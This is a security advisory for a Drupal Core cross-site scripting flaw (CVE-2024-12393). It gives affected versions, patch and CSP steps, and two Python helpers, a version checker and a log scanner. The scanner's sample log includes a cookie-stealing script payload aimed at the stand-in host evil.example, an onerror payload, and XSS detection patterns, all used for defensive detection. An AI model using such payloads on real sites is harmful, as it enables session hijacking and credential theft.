CVE-2024-12393
📋 TL;DR
This Cross-Site Scripting (XSS) vulnerability in Drupal Core allows attackers to inject malicious scripts into web pages viewed by other users. It affects Drupal sites running versions 8.8.0 through 10.2.10, 10.3.0 through 10.3.8, and 11.0.0 through 11.0.7. Users who view compromised pages could have their sessions hijacked or be redirected to malicious sites.
💻 Affected Systems
- Drupal Core
📦 What is this software?
Drupal by Drupal
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, take over administrative accounts, deface websites, or redirect users to phishing/malware sites.
Likely Case
Session hijacking of regular users, cookie theft, or defacement of public-facing pages.
If Mitigated
Reduced impact if a strict Content Security Policy (no 'unsafe-inline', script-src limited to trusted origins) is enforced and user input validation is in place. These controls limit what an injected script can do; they do not remove the vulnerability, so patching is still required.
🎯 Exploit Status
Exploitation requires the ability to inject malicious content into Drupal pages, typically through user input fields or content creation.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.2.11, 10.3.9, 11.0.8
Vendor Advisory: https://www.drupal.org/sa-core-2024-003
Restart Required: No
Instructions:
1. Back up the Drupal site files and database.
2. Update Drupal core to 10.2.11, 10.3.9, or 11.0.8, whichever matches the minor branch you run (a 10.2.x site moves to 10.2.11; a 10.3.x site to 10.3.9; an 11.0.x site to 11.0.8).
3. Rebuild all caches from the admin interface or with drush: drush cr
🔧 Temporary Workarounds
Implement Content Security Policy
Add CSP headers to restrict the origins from which scripts may be loaded and executed.
Add to .htaccess (requires mod_headers): Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Or configure the header in the web server settings.
Caveat: a policy without 'unsafe-inline' will break inline scripts used by some themes and contrib modules, so roll it out first as Content-Security-Policy-Report-Only, review the violation reports, and only then enforce it. CSP constrains what an injected script can load or execute; it does not fix the underlying bug.
Input Validation Filter
Implement additional input sanitization for user-submitted content.
Implement custom form validation using Drupal's Form API (a #validate handler that rejects markup the field is not expected to carry).
Escape output with Html::escape() (\Drupal\Component\Utility\Html) or rely on Twig autoescaping; where some HTML must be allowed, filter it with Xss::filter() (\Drupal\Component\Utility\Xss). check_plain() was deprecated in Drupal 8 and removed in Drupal 9, so it is not available on most affected versions.
🧯 If You Can't Patch
- Implement strict Content Security Policy headers to limit script execution
- Disable or restrict user content submission features until patching is possible
🔍 How to Verify
Check if Vulnerable:
Read the running core version from /admin/reports/status in the browser, or run: drush status | grep 'Drupal version'
Any release from 8.8.0 up to 10.2.10 (this includes all 8.9, 9.x, 10.0 and 10.1 releases), 10.3.0 through 10.3.8, or 11.0.0 through 11.0.7 is vulnerable.
Verify Fix Applied:
Confirm the running version is at or past the fixed release for its own branch: 10.2.11 or a later 10.2.x, 10.3.9 or a later 10.3.x, 11.0.8 or a later 11.0.x, or any later minor or major release. A numerically higher version on a different branch is not necessarily fixed: 10.3.0 is newer than 10.2.11 but is vulnerable. Check that all core updates were applied successfully; with the Update Manager module enabled, the status report at /admin/reports/status also flags pending core updates.
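The branch rule above is easy to get wrong by hand across many sites, so here is an added example (not Drupal or Drush project code) that encodes the advisory's three affected ranges and classifies a version string, or the version line from `drush status` output. The drush output below is a constructed sample shaped like the "Drupal version : X.Y.Z" line the page greps for; pre-release suffixes such as 10.3.9-rc1 are treated as older than the final release so they are never reported as fixed.

```python
"""Decide whether a Drupal core version is inside the affected ranges of
SA-CORE-2024-003 / CVE-2024-12393.

Added example, not Drupal or Drush project code. The drush status excerpt
below is constructed to match the "Drupal version : X.Y.Z" line the page
greps for."""
import re

# [first affected, first fixed) per release branch, from the advisory.
# 4th element: 0 = pre-release (e.g. 10.3.9-rc1), 1 = final release,
# so a pre-release of the fixed version still counts as vulnerable.
AFFECTED_RANGES = (
    ((8, 8, 0, 0), (10, 2, 11, 1)),   # 8.8.0 .. 10.2.10 (includes 8.9, 9.x, 10.0, 10.1)
    ((10, 3, 0, 0), (10, 3, 9, 1)),   # 10.3.0 .. 10.3.8
    ((11, 0, 0, 0), (11, 0, 8, 1)),   # 11.0.0 .. 11.0.7
)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?$")


def parse_version(text):
    """Turn '10.3.9' or '10.3.9-rc1' into a comparable tuple."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Drupal core version: {text!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    is_final = 0 if m.group(4) else 1
    return (major, minor, patch, is_final)


def is_vulnerable(version):
    """True if the version lies in any affected range. Versions below 8.8.0
    are outside the advisory's ranges (and long end-of-life), so False here
    means 'not listed', not 'safe'."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def check_drush_status(output):
    """Extract the core version from `drush status` text output and classify it.
    Returns (version, vulnerable)."""
    m = re.search(r"Drupal version\s*:\s*(\S+)", output)
    if not m:
        raise ValueError("no 'Drupal version' line in drush status output")
    version = m.group(1)
    return version, is_vulnerable(version)


# Constructed sample of `drush status` output for a site on 10.2.10.
SAMPLE_DRUSH_STATUS = """\
 Drupal version   : 10.2.10
 Site URI         : http://default
 DB driver        : mysql
 Drupal bootstrap : Successful
"""

if __name__ == "__main__":
    version, vulnerable = check_drush_status(SAMPLE_DRUSH_STATUS)
    print(f"{version}: {'VULNERABLE, update' if vulnerable else 'at or past fixed release'}")
```

To use it against a live site, pipe the real output in (for example, `drush status` run on the host) instead of the constructed sample; the classification logic is unchanged.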
📡 Detection & Monitoring
Log Indicators:
- Unusual content submissions with script tags
- Multiple failed login attempts from new locations (a generic indicator, not specific to this XSS; successful logins or session use for privileged accounts from unexpected addresses is the signal to look for if session hijacking is suspected)
- Watchdog entries showing suspicious input patterns
Network Indicators:
- Unexpected external script loads in page responses
- Suspicious redirects from Drupal pages
SIEM Query:
source="drupal_access" AND (message="*<script>*" OR message="*javascript:*")
The literal pattern only catches unencoded payloads and will be noisy on sites that legitimately log HTML; pair it with URL-encoded (%3Cscript) and entity-encoded (&lt;script) forms, and scope it to write requests (POST to node/add, node/*/edit, comment/reply) where possible.
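Because a plain "*<script>*" match misses encoded payloads, here is an added example (not Drupal code) of the same detection logic run over log lines offline: each line is percent-decoded and entity-decoded a bounded number of times before a short set of XSS markers is applied. The watchdog and access-log lines are constructed samples in a shortened format, and the set of event-handler names is an assumption to be extended for your site.

```python
"""Scan log lines for XSS payload markers, decoding URL/HTML encoding first so
that %3Cscript%3E and &lt;script&gt; are caught as well as a literal <script>.

Added example, not Drupal code. Sample lines are constructed: syslog-style
watchdog lines and Apache combined-log lines in a shortened format."""
import html
import re
from urllib.parse import unquote

# Indicator name -> pattern, evaluated on the decoded text. The event-handler
# list is deliberately short; extend it rather than matching any on*= token,
# which would flag innocent query parameters such as one=1.
XSS_PATTERNS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "javascript-uri": re.compile(r"javascript\s*:", re.I),
    "event-handler": re.compile(r"\bon(?:error|load|click|mouseover|focus|pageshow)\s*=", re.I),
    "active-embed": re.compile(r"<\s*(?:iframe|object|embed|svg)\b", re.I),
}


def normalise(text, rounds=3):
    """Percent-decode then entity-decode, repeating a bounded number of times
    so double-encoded payloads unwrap; stop as soon as a pass changes nothing."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def find_xss_indicators(lines):
    """Return [(line_number, [indicator, ...]), ...] for lines that match."""
    hits = []
    for n, line in enumerate(lines, 1):
        decoded = normalise(line)
        found = [name for name, pat in XSS_PATTERNS.items() if pat.search(decoded)]
        if found:
            hits.append((n, found))
    return hits


# Constructed sample: line 2 is a watchdog entry where a stored-XSS payload
# landed in an article title; line 3 is an entity-then-URL-encoded search query;
# line 5 contains "one=1" and "javascript-basics", which must not alert.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Nov/2024:10:01:02 +0000] "GET /node/42 HTTP/1.1" 200 5321',
    'Nov 20 10:01:09 web1 drupal: content|203.0.113.7|/node/add/article|uid=12|'
    'article: added <script>new Image().src="https://evil.example/?"+document.cookie</script>.',
    '198.51.100.9 - - [20/Nov/2024:10:02:10 +0000] '
    '"GET /search/node?keys=%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(1)%26gt%3B HTTP/1.1" 200 812',
    'Nov 20 10:02:33 web1 drupal: user|198.51.100.9|/user/login|uid=0|Login attempt failed for editor.',
    '192.0.2.4 - - [20/Nov/2024:10:03:01 +0000] "GET /docs?one=1&topic=javascript-basics HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for n, found in find_xss_indicators(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
```

Feed it real watchdog or web-server lines instead of SAMPLE_LOG; the decode-then-match order is what makes the difference from the SIEM query above.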